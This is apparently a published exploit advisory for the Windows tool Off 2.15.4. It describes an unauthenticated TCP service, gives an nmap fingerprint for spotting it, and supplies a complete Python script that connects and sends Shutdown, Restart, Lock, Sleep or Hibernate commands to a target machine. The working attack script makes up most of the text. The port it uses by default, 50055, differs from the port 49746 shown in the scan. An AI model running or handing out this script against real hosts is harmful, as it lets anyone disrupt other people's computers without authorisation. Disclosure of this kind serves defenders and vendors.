# Exploit Title: Off 2.15.4 - Unauthenticated Remote System Control (Shutdown/Restart/Lock/Sleep/Hibernate) # Date: 25/06/25 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.bridgetech.io # Software Link: https://www.bridgetech.io/OffWindows_Latest.zip # Version: 2.15.4 # Tested on: Windows 10 (Build 19044) ''' Description: Off 2.15.4 exposes a TCP service that accepts remote commands like Shutdown, Restart, Lock, Sleep, and Hibernate without any authentication. Identification: nmap -sV --version-intensity 0 -T5 -p- 192.168.8.105 output: PORT STATE SERVICE VERSION 49746/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port49746-TCP:V=7.94SVN%I=0%D=6/25%Time=685B86E0%P=x86_64-pc-linux-gnu% SF:r(NULL,9,"unlocked\n"); should return "unlocked". ''' #!/usr/bin/env python3 import socket import argparse import sys def control_pc(ip, port, action): try: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.connect((ip, port)) s.send(b"Hello\x0a") s.recv(1024) s.send((action + "\x0a").encode()) print(f"Sent {action} command") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--lock", action="store_true") parser.add_argument("--shutdown", action="store_true") parser.add_argument("--restart", action="store_true") parser.add_argument("--hibernate", action="store_true") parser.add_argument("--sleep", action="store_true") parser.add_argument("--ip", default="192.168.8.105") parser.add_argument("--port", type=int, default=50055) args = parser.parse_args() actions = { "Lock": args.lock, "Shutdown": args.shutdown, "Restart": args.restart, "Hibernate": args.hibernate, "Sleep": args.sleep } selected = [a for a, v in actions.items() if v] if len(selected) != 1: print("Specify one action") sys.exit(1) control_pc(args.ip, args.port, selected[0])